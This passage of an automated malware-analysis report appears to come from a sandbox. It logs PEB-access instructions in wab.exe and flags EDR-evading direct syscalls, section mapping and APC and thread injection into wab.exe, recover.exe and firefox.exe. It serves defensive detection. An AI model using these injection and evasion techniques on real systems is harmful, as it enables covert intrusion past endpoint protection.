Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0BBE mov eax, dword ptr fs:[00000030h] 10_2_1FDB0BBE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE69B8B mov eax, dword ptr fs:[00000030h] 10_2_1FE69B8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE69B8B mov eax, dword ptr fs:[00000030h] 10_2_1FE69B8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FB97 mov eax, dword ptr fs:[00000030h] 10_2_1FE5FB97
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9FB4C mov edi, dword ptr fs:[00000030h] 10_2_1FD9FB4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6AB40 mov eax, dword ptr fs:[00000030h] 10_2_1FE6AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE48B42 mov eax, dword ptr fs:[00000030h] 10_2_1FE48B42
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CB7E mov eax, dword ptr fs:[00000030h] 10_2_1FD9CB7E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE68B28 mov eax, dword ptr fs:[00000030h] 10_2_1FE68B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE68B28 mov eax, dword ptr fs:[00000030h] 10_2_1FE68B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov edx, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA1B04 mov eax, dword ptr fs:[00000030h] 10_2_1FDA1B04
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA1B04 mov eax, dword ptr fs:[00000030h] 10_2_1FDA1B04
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FB0C mov eax, dword ptr fs:[00000030h] 10_2_1FE5FB0C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B28 mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B28 mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEB20 mov eax, dword ptr fs:[00000030h] 10_2_1FDCEB20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEB20 mov eax, dword ptr fs:[00000030h] 10_2_1FDCEB20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCBADA mov eax, dword ptr fs:[00000030h] 10_2_1FDCBADA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0AD0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA0AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD4AD0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD4AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD4AD0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD4AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF6ACC mov eax, dword ptr fs:[00000030h] 10_2_1FDF6ACC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF6ACC mov eax, dword ptr fs:[00000030h] 10_2_1FDF6ACC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF6ACC mov eax, dword ptr fs:[00000030h] 10_2_1FDF6ACC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE21ACB mov eax, dword ptr fs:[00000030h] 10_2_1FE21ACB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE21ACB mov ecx, dword ptr fs:[00000030h] 10_2_1FE21ACB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDAAEE mov eax, dword ptr fs:[00000030h] 10_2_1FDDAAEE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDAAEE mov eax, dword ptr fs:[00000030h] 10_2_1FDDAAEE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9BAE0 mov eax, dword ptr fs:[00000030h] 10_2_1FD9BAE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4DAAC mov ecx, dword ptr fs:[00000030h] 10_2_1FE4DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4DAAC mov ecx, dword ptr fs:[00000030h] 10_2_1FE4DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4DAAC mov eax, dword ptr fs:[00000030h] 10_2_1FE4DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD8A90 mov edx, dword ptr fs:[00000030h] 10_2_1FDD8A90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97A80 mov eax, dword ptr fs:[00000030h] 10_2_1FD97A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97A80 mov eax, dword ptr fs:[00000030h] 10_2_1FD97A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97A80 mov eax, dword ptr fs:[00000030h] 10_2_1FD97A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FA87 mov eax, dword ptr fs:[00000030h] 10_2_1FE5FA87
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE74A80 mov eax, dword ptr fs:[00000030h] 10_2_1FE74A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDAAE mov eax, dword ptr fs:[00000030h] 10_2_1FDCDAAE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABAA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABAA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABAA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABAA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8AA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8AA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF6AA4 mov eax, dword ptr fs:[00000030h] 10_2_1FDF6AA4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9FAA4 mov ecx, dword ptr fs:[00000030h] 10_2_1FD9FAA4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0A5B mov eax, dword ptr fs:[00000030h] 10_2_1FDB0A5B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0A5B mov eax, dword ptr fs:[00000030h] 10_2_1FDB0A5B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CA72 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CA72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CA72 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CA72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD99A40 mov ecx, dword ptr fs:[00000030h] 10_2_1FD99A40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA6F mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA6F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA6F mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA6F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA6F mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA6F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC9A18 mov ecx, dword ptr fs:[00000030h] 10_2_1FDC9A18
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9BA10 mov eax, dword ptr fs:[00000030h] 10_2_1FD9BA10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5A01 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5A01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5A01 mov ecx, dword ptr fs:[00000030h] 10_2_1FDD5A01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5A01 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5A01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5A01 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5A01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA38 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA38
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FA02 mov eax, dword ptr fs:[00000030h] 10_2_1FE5FA02
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC4A35 mov eax, dword ptr fs:[00000030h] 10_2_1FDC4A35
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC4A35 mov eax, dword ptr fs:[00000030h] 10_2_1FDC4A35
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov ecx, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEA2E mov eax, dword ptr fs:[00000030h] 10_2_1FDCEA2E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2CA11 mov eax, dword ptr fs:[00000030h] 10_2_1FE2CA11
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE47A11 mov edi, dword ptr fs:[00000030h] 10_2_1FE47A11
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA24 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA24
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDA20 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDA20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDA20 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDA20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1DA1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1DA1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCD9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCD9D0

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtOpenKeyEx: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryValueKey: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: NULL target: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: NULL target: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\recover.exe Thread register set: target process: 5996 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\recover.exe Thread APC queued: target process: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: C0FFCC Jump to behavior
Creates a process in suspended mode (likely to inject code)
